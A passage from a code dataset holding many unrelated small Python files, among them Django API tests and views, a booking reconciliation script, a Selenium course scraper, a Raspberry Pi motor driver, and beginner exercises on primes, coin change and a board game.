tweets.models import Tweet\n\nTWEET_CREATE_API = '/api/tweets/'\nTWEET_LIST_API = '/api/tweets/'\n\nclass TweetApiTests(TestCase):\n\n    def setUp(self):\n        self.anonymous_client = APIClient()\n\n        self.user1 = self.create_user('user1', 'user1@jiuzhang.com')\n        self.tweets1 = [\n            self.create_tweet(self.user1)\n            for i in range(3)\n        ]\n        self.user1_client = APIClient()\n        self.user1_client.force_authenticate(self.user1)\n\n        self.user2 = self.create_user('user2', 'user2@jiuzhang.com')\n        self.tweets2 = [\n            self.create_tweet(self.user2)\n            for i in range(2)\n        ]\n\n    def test_list_api(self):\n        response = self.anonymous_client.get(TWEET_LIST_API)\n        self.assertEqual(response.status_code, 400)\n\n        response = self.anonymous_client.get(TWEET_LIST_API, {'user_id': self.user1.id})\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(len(response.data['Tweets']), 3)\n        response = self.anonymous_client.get(TWEET_LIST_API, {'user_id': self.user2.id})\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(len(response.data['Tweets']), 2)\n        self.assertEqual(response.data['Tweets'][0]['id'], self.tweets2[1].id)\n        self.assertEqual(response.data['Tweets'][1]['id'], self.tweets2[0].id)\n\n    def test_create_api(self):\n        # must log in\n        response = self.anonymous_client.post(TWEET_CREATE_API)\n        
self.assertEqual(response.status_code, 403)\n\n # must with content\n response = self.user1_client.post(TWEET_CREATE_API)\n self.assertEqual(response.status_code, 400)\n # content too short\n response = self.user1_client.post(TWEET_CREATE_API, {'content': '1'})\n self.assertEqual(response.status_code, 400)\n # content too long\n response = self.user1_client.post(TWEET_CREATE_API, {'content': '1' * 141})\n self.assertEqual(response.status_code, 400)\n\n tweets_count = Tweet.objects.count()\n response = self.user1_client.post(TWEET_CREATE_API, {\n 'content': 'hangbao is the best'\n })\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.data['user'], self.user1.id)\n self.assertEqual(Tweet.objects.count(), tweets_count + 1)\n","sub_path":"tweets/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"384485957","text":"import pandas as pd\nimport xlsxwriter\nimport os\nimport datetime\n\n# find the files neede to process\nhotel_file = \"\"\nwebsite_file = \"\"\nfiles = [f for f in os.listdir('.') if os.path.isfile(f)]\nfor f in files:\n if \"report\" in f and f[:2] != \"~$\":\n hotel_file = f\n if \"Booking.com\" in f and f[:2] != \"~$\":\n website_file = f\n\nmsg = \"Files detected:\\n\" + website_file + \"\\n\" + hotel_file + \"\\n\" + \"\\n\" + \"Press Enter key to begin the process.\"\na = raw_input(msg)\n\n\n# developed with python 3.5 for pyinstaller function\n#############################################################\n# check conditions and print out\ndef same_name(booking_name, hotel_name):\n if hotel_name[:5] == 'name\\n':\n hotel_name = hotel_name[5:]\n\n hotel_name = hotel_name.split(\",\")\n hotel_name = hotel_name[1][:] + \" \" + hotel_name[0]\n\n if hotel_name == booking_name:\n # print(\"h:\", hotel_name, \"b:\", booking_name)\n return True\n else:\n return False\n\n\n######################################################################################\nmatch = 0\ncanceled = 0\nnot_found = 0\n\n# load and prepare the booking df\nxl = pd.ExcelFile(website_file)\nwebsite_df = xl.parse(header=0, keep_default_na=False)\n\nwebsite_col_names = list(website_df)\nprint(website_col_names)\nfor name in website_col_names:\n a = name.split(\" \")\n if a[-1] == \"\":\n b = \" \".join(a[:-1])\n else:\n b = \" \".join(a)\n website_df = website_df.rename(columns={name: b})\n\nwebsite_col_names = list(website_df)\nprint(website_col_names)\n\nweb_df = website_df[website_df['Status'] == 'ok']\nprint('booking df created')\n\nguest_col_name = \"\"\nif \"Guest name(s)\" in list(web_df):\n guest_col_name = 'Guest name(s)'\n print(\"YESSSSSSSSSSSSSS\")\nelse:\n guest_col_name = 'Guest Name(s)'\n print(\"22222222222222\")\n\nfor index, row in web_df.iterrows():\n if row[guest_col_name] == '':\n name = row['Booked by']\n # .encode('utf-8')\n guest_name = name.split(\",\")\n web_df.loc[index, guest_col_name] = guest_name[1][1:] + \" \" + guest_name[0]\n\n##########################################\n# loading the ok DF\nxl = pd.ExcelFile(hotel_file)\no_df = xl.parse(header=0, keep_default_na=False, )\n\n\n#########################################\nbook_col_name = list(web_df)[0]\n\nprint(\"begin comparison\")\n# create worksheet\nworkbook = xlsxwriter.Workbook('Expenses.xlsx')\nworksheet = workbook.add_worksheet()\nrowm = 0\ncoln = 0\nworksheet.write(rowm, coln, \"Confirmation Number\")\nworksheet.write(rowm, coln + 1, \"CRS 
Number\")\nworksheet.write(rowm, coln + 2, \"Name\")\nworksheet.write(rowm, coln + 3, \"Booking.com Price\")\nworksheet.write(rowm, coln + 4, \"Description\")\nrowm += 1\n\nworkbook_nf = xlsxwriter.Workbook('Customers Not found.xlsx')\nworksheet_nf = workbook_nf.add_worksheet()\nrow_nf = 0\n\n# # print web_df\n# print(list(web_df))\n# for index, row in web_df.iterrows():\n# print(\"index:::\", index, row['Guest name(s)'].lower(),row['Check-in'],row['Check-out'],row['Price'])\n#\n\n# check loop\ngood = 0\nfor index, row in web_df.iterrows():\n\n # initialzie what to compare\n name = row[guest_col_name]\n check_in_date = row['Check-in']\n check_out_date = row['Check-out']\n # print(\"check_in_date: \", check_in_date)\n check_in_date = check_in_date.split(\"-\")\n # print(\"check_in_date after split: \", check_in_date)\n check_out_date = check_out_date.split(\"-\")\n found = False\n\n # check if in ok, but different price\n for index_ok, row_ok in o_df.iterrows():\n if (same_name(name.lower(), row_ok['GuestName'].lower())):\n found = True\n\n if row_ok['CancelDt'] != \"\":\n print(\"ROOM canceled\", row_ok['CancelDt'])\n\n worksheet.write(rowm, coln, row['Book number'])\n worksheet.write(rowm, coln + 1, row_ok['CRSBookNum'])\n worksheet.write(rowm, coln + 2, name)\n worksheet.write(rowm, coln + 3, row['Price'])\n worksheet.write(rowm, coln + 4, \"Cancelled\")\n\n print(name, \" found in CANCEL file\")\n rowm += 1\n canceled += 1\n break\n\n # if not found in cancel file, we check the date\n # hotel date\n date_format = \"%m/%d/%Y\"\n arrival = row_ok['ArrivalDt']\n\n h_arrival = datetime.datetime.strptime(arrival, date_format)\n h_departure = h_arrival + datetime.timedelta(days=row_ok['DaysStay'])\n # + int(row_ok['DaysStay'])\n\n # booking.com date\n\n b_checkin = datetime.datetime(int(check_in_date[0]), int(check_in_date[1]), int(check_in_date[2][:2]))\n b_checkout = datetime.datetime(int(check_out_date[0]), int(check_out_date[1]),\n int(check_out_date[2][:2]))\n found = True\n match += 1\n\n # print('h_arrival: ', h_arrival)\n # print('h_departure: ', h_departure)\n # print(\"b_checkin: \", b_checkin)\n # print(\"b_checkout\", b_checkout)\n\n if not ((h_arrival == b_checkin) & (h_departure == b_checkout)):\n worksheet.write(rowm, coln, row['Book number'])\n worksheet.write(rowm, coln + 1, row_ok['CRSBookNum'])\n worksheet.write(rowm, coln + 2, name)\n worksheet.write(rowm, coln + 3, row['Price'])\n worksheet.write(rowm, coln + 4, \"Checked in, but different date\")\n print(name, \" Found in OK file, but different date\")\n rowm += 1\n break\n else:\n good += 1\n print(name,\" everything match!\")\n break\n\n if found == False:\n # print(name, \" Can't find customer Name\")\n not_found += 1\n worksheet_nf.write(row_nf, 0, name)\n row_nf += 1\n print(name, \" customer not found\")\n\nprint('finished')\nprint(\"good:\", good)\nprint(\"match: \", match)\nprint(\"canceled: \", canceled)\nprint(\"not found: \", not_found)\nworkbook.close()\nworkbook_nf.close()\n\n","sub_path":"working_windows_extension/version_4/best_western/booking/best_western_booking_py27_V4.py","file_name":"best_western_booking_py27_V4.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"153198184","text":"def findSimple(a):\n simples = {}\n for i in range(a//2, 1, -1): #int(a**0.5)\n while True:\n if a / i == a // i:\n if i in simples:\n simples[i] += 1\n else:\n simples[i] = 1\n a /= i\n else:\n break\n if not simples:\n 
simples[a] = 1\n    return simples\n\nn, k = [int(x) for x in input().split()]\nns, ks = findSimple(n), findSimple(k)\n#print(ns, ks)\nfor key in ks:\n    if key not in ns:\n        ns[key] = ks[key]\n    elif ks[key] > ns[key]:\n        ns[key] = ks[key]\n\nnumber = 1\nfor key in ns:\n    number *= key ** ns[key]\nprint(number)\n","sub_path":"Олимпиады/Окружной этап 2012/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"283322460","text":"from selenium import webdriver\nimport time\nimport datetime\n\nclass PythonOrgSearch():\n    def __init__(self):\n        chrome_options = webdriver.ChromeOptions()\n        chrome_options.add_argument('--disable-extensions')\n        chrome_options.add_argument('--headless')\n        \n        self.driver = webdriver.Chrome(options=chrome_options)\n\n    def test_search(self, url):\n        table = []\n        url = url\n\n        time.sleep(1)\n\n        for i in range(0, len(url)):\n            print(\"Opening page: \" + str(url[i]))\n            fullurl = 'https://www.udemy.com/courses/' + url[i] + '/?lang=pl&price=price-free&sort=popularity'\n            self.driver.get(fullurl)\n            time.sleep(2)\n\n            find_class = self.driver.find_elements_by_class_name('component-margin')\n            find_tagname = find_class[(len(find_class)-1)].find_elements_by_tag_name('a')\n\n            licznik = 0\n            for value in find_tagname:\n                if 'course/' in value.get_attribute('href'):\n                    licznik+=1\n                    # print(value.get_attribute('href'))\n                    table.append(value.get_attribute('href'))\n\n            if licznik >= 1:\n                print('\n(%s) Number of free courses found: %d\n' % (str(url[i]), licznik))\n            else:\n                print('\n(%s) Number of free courses found: 0\n' % (str(url[i])))\n        return table\n\n\n\n\n\nif __name__ == \"__main__\":\n    url = [\n        'development',\n        'business',\n        'finance-and-accounting',\n        'it-and-software',\n        'office-productivity',\n        'personal-development',\n        'design',\n        'marketing',\n        'lifestyle',\n        'photography-and-video',\n        'health-and-fitness',\n        'music',\n        'teaching-and-academics']\n\n    \n    main = PythonOrgSearch()\n    table = main.test_search(url)\n\n    mydate = datetime.datetime.now()\n    mydate = mydate.strftime(\"%d%m%Y\")\n\n    full_url = \"Udemy-PolskieKursy \" + mydate + \".txt\"\n    file = open(full_url, \"w\")\n\n    for value in table:\n        print(value)\n        file.write(value+\"\\n\")\n    \n    file.close()\n\n    print('\nFinished successfully. 
:)')\n\n # print(table)\n\n\n \n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631291327","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport time\nimport math\nimport smbus\nimport RPi.GPIO as GPIO\n\nDir = [\n 'forward',\n 'backward',\n]\n\nclass PCA9685:\n\n # Registers/etc.\n __SUBADR1 = 0x02\n __SUBADR2 = 0x03\n __SUBADR3 = 0x04\n __MODE1 = 0x00\n __PRESCALE = 0xFE\n __LED0_ON_L = 0x06\n __LED0_ON_H = 0x07\n __LED0_OFF_L = 0x08\n __LED0_OFF_H = 0x09\n __ALLLED_ON_L = 0xFA\n __ALLLED_ON_H = 0xFB\n __ALLLED_OFF_L = 0xFC\n __ALLLED_OFF_H = 0xFD\n\n def __init__(self, address, debug=False):\n self.bus = smbus.SMBus(1)\n self.address = address\n self.debug = debug\n if (self.debug):\n print(\"Reseting PCA9685\")\n self.write(self.__MODE1, 0x00)\n\n def write(self, reg, value):\n \"Writes an 8-bit value to the specified register/address\"\n self.bus.write_byte_data(self.address, reg, value)\n if (self.debug):\n print(\"I2C: Write 0x%02X to register 0x%02X\" % (value, reg))\n\n def read(self, reg):\n \"Read an unsigned byte from the I2C device\"\n result = self.bus.read_byte_data(self.address, reg)\n if (self.debug):\n print(\"I2C: Device 0x%02X returned 0x%02X from reg 0x%02X\" % (self.address, result & 0xFF, reg))\n return result\n\n def setPWMFreq(self, freq):\n \"Sets the PWM frequency\"\n prescaleval = 25000000.0 # 25MHz\n prescaleval /= 4096.0 # 12-bit\n prescaleval /= float(freq)\n prescaleval -= 1.0\n if (self.debug):\n print(\"Setting PWM frequency to %d Hz\" % freq)\n print(\"Estimated pre-scale: %d\" % prescaleval)\n prescale = math.floor(prescaleval + 0.5)\n if (self.debug):\n print(\"Final pre-scale: %d\" % prescale)\n\n oldmode = self.read(self.__MODE1)\n newmode = (oldmode & 0x7F) | 0x10 # sleep\n self.write(self.__MODE1, newmode) # go to sleep\n self.write(self.__PRESCALE, int(math.floor(prescale)))\n self.write(self.__MODE1, oldmode)\n time.sleep(0.005)\n self.write(self.__MODE1, oldmode | 0x80)\n\n def setPWM(self, channel, on, off):\n \"Sets a single PWM channel\"\n self.write(self.__LED0_ON_L + 4*channel, on & 0xFF)\n self.write(self.__LED0_ON_H + 4*channel, on >> 8)\n self.write(self.__LED0_OFF_L + 4*channel, off & 0xFF)\n self.write(self.__LED0_OFF_H + 4*channel, off >> 8)\n if (self.debug):\n print(\"channel: %d LED_ON: %d LED_OFF: %d\" % (channel,on,off))\n\n def setDutycycle(self, channel, pulse):\n self.setPWM(channel, 0, int(pulse * (4096 / 100)))\n\n def setLevel(self, channel, value):\n if (value == 1):\n self.setPWM(channel, 0, 4095)\n else:\n self.setPWM(channel, 0, 0)\n \n\n\n\n# 控制机器人库\nclass LOBOROBOT():\n def __init__(self):\n self.PWMA = 0\n self.AIN1 = 2\n self.AIN2 = 1\n\n self.PWMB = 5\n self.BIN1 = 3\n self.BIN2 = 4\n\n self.PWMC = 6\n self.CIN2 = 7\n self.CIN1 = 8\n\n self.PWMD = 11\n self.DIN1 = 25\n self.DIN2 = 24\n self.pwm = PCA9685(0x40, debug=False)\n self.pwm.setPWMFreq(50)\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.DIN1,GPIO.OUT)\n GPIO.setup(self.DIN2,GPIO.OUT)\n\n def MotorRun(self, motor, index, speed):\n if speed > 100:\n return\n if(motor == 0):\n self.pwm.setDutycycle(self.PWMA, speed)\n if(index == Dir[0]):\n self.pwm.setLevel(self.AIN1, 0)\n self.pwm.setLevel(self.AIN2, 1)\n else:\n self.pwm.setLevel(self.AIN1, 1)\n self.pwm.setLevel(self.AIN2, 0)\n elif(motor == 1):\n self.pwm.setDutycycle(self.PWMB, speed)\n if(index == Dir[0]):\n 
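# Dir[0] is 'forward'; the two BIN pins are driven with opposite polarity below, and swapping them reverses the motor\n                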
self.pwm.setLevel(self.BIN1, 1)\n                self.pwm.setLevel(self.BIN2, 0)\n            else:\n                self.pwm.setLevel(self.BIN1, 0)\n                self.pwm.setLevel(self.BIN2, 1)\n        elif(motor == 2):\n            self.pwm.setDutycycle(self.PWMC,speed)\n            if(index == Dir[0]):\n                self.pwm.setLevel(self.CIN1,1)\n                self.pwm.setLevel(self.CIN2,0)\n            else:\n                self.pwm.setLevel(self.CIN1,0)\n                self.pwm.setLevel(self.CIN2,1)\n        elif(motor == 3):\n            self.pwm.setDutycycle(self.PWMD,speed)\n            if (index == Dir[0]):\n                GPIO.output(self.DIN1,0)\n                GPIO.output(self.DIN2,1)\n            else:\n                GPIO.output(self.DIN1,1)\n                GPIO.output(self.DIN2,0)\n\n    def MotorStop(self, motor):\n        if (motor == 0):\n            self.pwm.setDutycycle(self.PWMA, 0)\n        elif(motor == 1):\n            self.pwm.setDutycycle(self.PWMB, 0)\n        elif(motor == 2):\n            self.pwm.setDutycycle(self.PWMC, 0)\n        elif(motor == 3):\n            self.pwm.setDutycycle(self.PWMD, 0)\n    # Move forward\n    def t_up(self,speed,t_time):\n        self.MotorRun(0,'forward',speed)\n        self.MotorRun(1,'forward',speed)\n        self.MotorRun(2,'forward',speed)\n        self.MotorRun(3,'forward',speed)\n        time.sleep(t_time)\n    # Move backward\n    def t_down(self,speed,t_time):\n        self.MotorRun(0,'backward',speed)\n        self.MotorRun(1,'backward',speed)\n        self.MotorRun(2,'backward',speed)\n        self.MotorRun(3,'backward',speed)\n        time.sleep(t_time)\n\n    # Strafe left\n    def moveLeft(self,speed,t_time):\n        self.MotorRun(0,'backward',speed)\n        self.MotorRun(1,'forward',speed)\n        self.MotorRun(2,'forward',speed)\n        self.MotorRun(3,'backward',speed)\n        time.sleep(t_time)\n\n    # Strafe right\n    def moveRight(self,speed,t_time):\n        self.MotorRun(0,'forward',speed)\n        self.MotorRun(1,'backward',speed)\n        self.MotorRun(2,'backward',speed)\n        self.MotorRun(3,'forward',speed)\n        time.sleep(t_time)\n\n    # Turn left\n    def turnLeft(self,speed,t_time):\n        self.MotorRun(0,'backward',speed)\n        self.MotorRun(1,'forward',speed)\n        self.MotorRun(2,'backward',speed)\n        self.MotorRun(3,'forward',speed)\n        time.sleep(t_time)\n    \n    # Turn right\n    def turnRight(self,speed,t_time):\n        self.MotorRun(0,'forward',speed)\n        self.MotorRun(1,'backward',speed)\n        self.MotorRun(2,'forward',speed)\n        self.MotorRun(3,'backward',speed)\n        time.sleep(t_time)\n    \n    # Diagonal forward-left\n    def forward_Left(self,speed,t_time):\n        self.MotorStop(0)\n        self.MotorRun(1,'forward',speed)\n        self.MotorRun(2,'forward',speed)\n        self.MotorStop(3)\n        time.sleep(t_time)\n\n    # Diagonal forward-right\n    def forward_Right(self,speed,t_time):\n        self.MotorRun(0,'forward',speed)\n        self.MotorStop(1)\n        self.MotorStop(2)\n        self.MotorRun(3,'forward',speed)\n        time.sleep(t_time)\n\n    # Diagonal backward-left\n    def backward_Left(self,speed,t_time):\n        self.MotorRun(0,'backward',speed)\n        self.MotorStop(1)\n        self.MotorStop(2)\n        self.MotorRun(3,'backward',speed)\n        time.sleep(t_time)\n    \n    # Diagonal backward-right\n    def backward_Right(self,speed,t_time):\n        self.MotorStop(0)\n        self.MotorRun(1,'backward',speed)\n        self.MotorRun(2,'backward',speed)\n        self.MotorStop(3)\n        time.sleep(t_time)\n\n\n    # Stop\n    def t_stop(self,t_time):\n        self.MotorStop(0)\n        self.MotorStop(1)\n        self.MotorStop(2)\n        self.MotorStop(3)\n        time.sleep(t_time)\n\n    # Helper to make setting the servo pulse width simpler.\n    def set_servo_pulse(self,channel,pulse):\n        pulse_length = 1000000 # 1,000,000 us per second\n        pulse_length //= 60 # 60 Hz\n        print('{0}us per period'.format(pulse_length))\n        pulse_length //= 4096 # 12 bits of resolution\n        print('{0}us per bit'.format(pulse_length))\n        pulse *= 1000\n        pulse //= pulse_length\n        self.pwm.setPWM(channel, 0, pulse)\n\n    # Set the servo angle \n    def set_servo_angle(self,channel,angle):\n        angle=4096*((angle*11)+500)/20000\n        
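# maps 0-180 deg onto a 500-2480 us pulse (about 11 us per degree) within the 20000 us frame of the 50 Hz PWM, rescaled to the chip's 4096 counts\n        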
self.pwm.setPWM(channel,0,int(angle))\n","sub_path":"LOBOROBOT.py","file_name":"LOBOROBOT.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"296106848","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: D:\\dev\\scrapgo\\scrapgo\\modules\\request\\mixins.py\n# Compiled at: 2019-05-23 16:06:28\n# Size of source mod 2**32: 1030 bytes\nimport functools\nimport time\nfrom collections import abc\nfrom scrapgo import settings\n\nclass RequestMixin(object):\n    RETRY_INTERVAL_SECONDS = settings.RETRY_INTERVAL_SECONDS\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    @classmethod\n    def retry(self, func):\n\n        @functools.wraps(func)\n        def wrapper(*args, **kwargs):\n            if isinstance(self.RETRY_INTERVAL_SECONDS, abc.Iterable):\n                for i, sec in enumerate(self.RETRY_INTERVAL_SECONDS):\n                    try:\n                        r = func(*args, **kwargs)\n                    except Exception:\n                        message = 'Request Failed, retry after {}sec(tries: {})'.format(sec, i + 1)\n                        print(message)\n                        time.sleep(sec)\n                    else:\n                        return r\n\n            else:\n                r = func(*args, **kwargs)\n                return r\n\n        return wrapper","sub_path":"pycfiles/scrapgo-0.1.9.tar/mixins.cpython-37.py","file_name":"mixins.cpython-37.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"345314918","text":"import hashlib\n\n\ndef md5_hash():\n    with open('countries.json', encoding='utf8') as read_file:\n        for line in read_file:\n            yield hashlib.md5(line.encode('utf-8')).hexdigest()\n\n\nfor digest in md5_hash():\n    print(digest)\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"253367995","text":"import random\nimport math\nfrom datetime import date, timedelta\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic.base import TemplateView\nfrom django.urls import reverse_lazy\nfrom django.utils.translation import gettext_lazy as _\n\nfrom .models import KanjiEntry, KanjiLearningRecord, KanjiTestingRecord\n\n\nDEFAULT_BASE_INTERVAL = 1\nDEFAULT_INTERVAL_RATE = 2\n\n\ndef query_string(**kwargs):\n    query_params = []\n\n    for key in kwargs:\n        value = kwargs[key]\n        if value is not None and value is not False:\n            query_params.append(key + '=' + str(value))\n\n    if query_params:\n        return '?' 
+ '&'.join(query_params)\n\n return ''\n\n\nclass LearnKanjiView(LoginRequiredMixin, TemplateView):\n template_name = 'tutor/learn_kanji.html'\n extra_context = {'title': _('Learn Kanji')}\n\n def get(self, request, *args, **kwargs):\n user_id = request.user.id\n\n query_set = KanjiEntry.objects.filter(\n kanjilearningrecord__user__id=user_id,\n kanjilearningrecord__is_learnt=False\n ).order_by('order')\n\n if query_set.count() > 0:\n entry = query_set[0]\n else:\n return HttpResponseRedirect(reverse_lazy('learn_kanji_done'))\n\n return self.render_to_response(self.get_context_data(entry=entry))\n\n def post(self, request, *args, **kwargs):\n entry_id = request.POST['entry_id']\n\n query_set = KanjiLearningRecord.objects.filter(\n user_id=request.user.id,\n kanji_entry__id=entry_id\n )\n\n learning_record = query_set.get()\n learning_record.is_learnt = True\n learning_record.save()\n\n KanjiTestingRecord.objects.create(\n kanji_entry=KanjiEntry.objects.get(pk=entry_id),\n user=request.user\n )\n\n return HttpResponseRedirect(reverse_lazy('learn_kanji'))\n\n\nclass LearnKanjiDoneView(TemplateView):\n template_name = 'tutor/learn_kanji_done.html'\n extra_context = {'title': _('Learn Kanji Done')}\n\n\nclass TestKanjiView(LoginRequiredMixin, TemplateView):\n template_name = 'tutor/test_kanji.html'\n extra_context = {'title': _('Test Kanji')}\n\n def get(self, request, *args, **kwargs):\n user_id = request.user.id\n\n query_set = KanjiEntry.objects.filter(\n kanjilearningrecord__user__id=user_id,\n kanjilearningrecord__is_learnt=True,\n kanjitestingrecord__user__id=user_id,\n kanjitestingrecord__test_date__lte=date.today()\n ).order_by('order')\n\n if query_set.count() > 0:\n tested_entry = query_set[0]\n else:\n return HttpResponseRedirect(reverse_lazy('test_kanji_done'))\n\n choices = [tested_entry]\n query_set = KanjiEntry.objects.exclude(id=tested_entry.id)\n other_entry_count = query_set.count()\n\n if other_entry_count > 2:\n other_choice_count = 3\n else:\n other_choice_count = other_entry_count\n\n for i in random.sample(range(other_entry_count),\n other_choice_count):\n if bool(random.getrandbits(1)):\n choices.append(query_set[i])\n else:\n choices.insert(0, query_set[i])\n\n return self.render_to_response(\n self.get_context_data(choices=choices, tested_entry=tested_entry)\n )\n\n def post(self, request, *args, **kwargs):\n entry_id = request.POST['tested_entry_id']\n answer_correct = entry_id == request.POST.get('chosen_entry_id')\n\n record = KanjiTestingRecord.objects.get(\n kanji_entry_id=entry_id,\n user_id=request.user.id\n )\n\n if answer_correct:\n interval = (\n DEFAULT_BASE_INTERVAL *\n math.pow(DEFAULT_INTERVAL_RATE, record.correct_streak)\n )\n\n record.correct_streak += 1\n record.test_date += timedelta(days=interval)\n record.save()\n\n elif record.correct_streak != 0:\n record.correct_streak = 0\n record.test_date = date.today()\n record.save()\n\n return HttpResponseRedirect(\n reverse_lazy(\n 'test_kanji_reveal',\n kwargs={'entry_id': entry_id}\n ) +\n query_string(answer_correct=answer_correct)\n )\n\n\nclass TestKanjiRevealView(TemplateView):\n template_name = 'tutor/test_kanji_reveal.html'\n\n extra_context = {\n 'title': _('Test Kanji Reveal'),\n 'next_link': reverse_lazy('test_kanji')\n }\n\n def get(self, request, *args, **kwargs):\n entry = KanjiEntry.objects.get(pk=kwargs.get('entry_id'))\n answer_correct = bool(request.GET.get('answer_correct'))\n\n return self.render_to_response(\n self.get_context_data(entry=entry, answer_correct=answer_correct)\n 
)\n\n\nclass TestKanjiDoneView(TemplateView):\n template_name = 'tutor/test_kanji_done.html'\n extra_context = {'title': _('Test Kanji Done')}\n","sub_path":"tutor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"639379423","text":"#/usr/bin/python3\n#-*- coding:utf-8 -*-\n'''输入任何一个正整数n,并找出大于n的最小素数'''\n'''添加了判断是否为整数的语句'''\nm=input('请输入整数:')\nif m.isdigit(): #判断输入的是否是整数\n n = int(m) #把输入的整数由str类型转换为int\n while True: #无限循环\n n += 1\n # print(n)\n f = True\n a = 2\n while a < n - 1: #判断是否为素数,不是的话循环,是的话继续下一个语句\n if n % a == 0:\n f = False\n break\n a += 1\n if f:\n print('大于%s的最小素数是%d' % (m, n))\n break\nelse:\n print('你输入的数字不是整数')\n","sub_path":"2.程序流程控制/5.编程实践/3.找出大于n的素数.py","file_name":"3.找出大于n的素数.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"536407757","text":"# -*- coding: utf-8 -*-\n\"\"\"\nConsider the software that runs on a self-checkout machine. One task that it must be\nable to perform is to determine how much change to provide when the shopper pays\nfor a purchase with cash.\nWrite a program that begins by reading a number of cents from the user as an\ninteger. Then your program should compute and display the denominations of the\ncoins that should be used to give that amount of change to the shopper. The change\nshould be given using as few coins as possible. Assume that the machine is loaded\nwith pennies, nickels, dimes, quarters, loonies and toonies.\n\n\nInformation: A one dollar coin was introduced in Canada in 1987. It is referred to as a\nloonie because one side of the coin has a loon (a type of bird) on it. The two\ndollar coin, referred to as a toonie, was introduced 9 years later. 
Its name is\nderived from the combination of the number two and the name of the loonie.\n\n\n\n\n\n\n\"\"\"\n\ncents_per_loonie = 100\n\ncents_per_toonie = 200\n\ncents_per_quarter = 25\n\ncents_per_dime = 10\n\ncents_per_nickel = 5\n\n# let's read the number of cents from the user\ncents = int(input(\"Please enter the number of cents: \"))\n\n# We have to compute the minimum collection of coins to represent the number of cents entered by the user,\n# starting from the largest denomination so that as few coins as possible are used.\n\nprint(\" \", cents // cents_per_toonie, \"toonies\")\ncents = cents % cents_per_toonie\n\nprint(\" \", cents // cents_per_loonie, \"loonies\")\ncents = cents % cents_per_loonie\n\nprint(\" \", cents // cents_per_quarter, \"quarters\")\ncents = cents % cents_per_quarter\n\nprint(\" \", cents // cents_per_dime, \"dimes\")\ncents = cents % cents_per_dime\n\nprint(\" \", cents // cents_per_nickel, \"nickels\")\ncents = cents % cents_per_nickel\n\nprint(\" \", cents, \"pennies\")\n\n","sub_path":"Exercise 13 Making Change.py","file_name":"Exercise 13 Making Change.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"428994676","text":"import random\nimport collections\n\nclass Partida:\n\n    #G Comprueba que el codigo sea el correcto en funcion del numero de jugadores.\n    def jugadores_jugando(self, nombres_jugadores):\n\n        numero_jugadores = len(nombres_jugadores)\n\n        if (numero_jugadores == 1):\n\n            return \"\\nTenemos un solo jugador participando en el carcassonne, su nombre es \"+ nombres_jugadores[0]+\".\\\n\\nDebemos incluir mas.\\n\"\n\n        elif (numero_jugadores == 2):\n            return \"\\nTenemos dos jugadores participando en el carcassonne, sus nombres son \"+ nombres_jugadores[0]+\" y \"+nombres_jugadores[1]+\".\\\n\\nPodemos incluir mas.\\n\"\n        else:\n            return \"\\nTenemos bastantes jugadores participando en el carcassonne, sus nombres son \"+ nombres_jugadores[0]+\", \"+nombres_jugadores[1]+\" y \"+nombres_jugadores[2]+\".\\\n\\nNo es necesario incluir mas.\\n\"\n\n    # Comprueba que el numero de jugadores sea correcto\n    def num_jug_correcto(self, nombres_jugadores):\n        num_maximo_jugadores = 4\n        num_minimo_jugadores = 2\n        num_jugadores = len(nombres_jugadores)\n        if num_jugadores > num_maximo_jugadores or num_jugadores < num_minimo_jugadores:\n            return False\n        else:\n            return True\n\n    #G Necesito esta funcion al meter a cada jugador nombre y edad.\n    def devuelve_nombres_jugadores(self, jugadores):\n        lista_nombres_jugadores = []\n\n        for jugador in jugadores:\n            lista_nombres_jugadores.append(jugador[0])\n        return lista_nombres_jugadores\n\n    # Comprueba que el nombre de los jugadores sea correcto\n    def nombres_jug_correcto(self, nombres_jugadores):\n        # Cuento la frecuencia de repeticion de los nombres\n        freq = collections.Counter(nombres_jugadores).values()\n        if max(freq) > 1:\n            return False\n        else:\n            return True\n\n    # Inicializa la lista de jugadores\n    def inicializar_jugadores(self, nombres_jugadores):\n        lista_jugadores = []\n        for nombre in nombres_jugadores:\n            lista_jugadores.append(Jugador(nombre))\n        return lista_jugadores\n\n    #G Mezcla los jugadores(cambia el orden)\n    def jugador_decide_orden(self, jugadores):\n        random.shuffle(jugadores)\n\n        return jugadores\n\n    #G 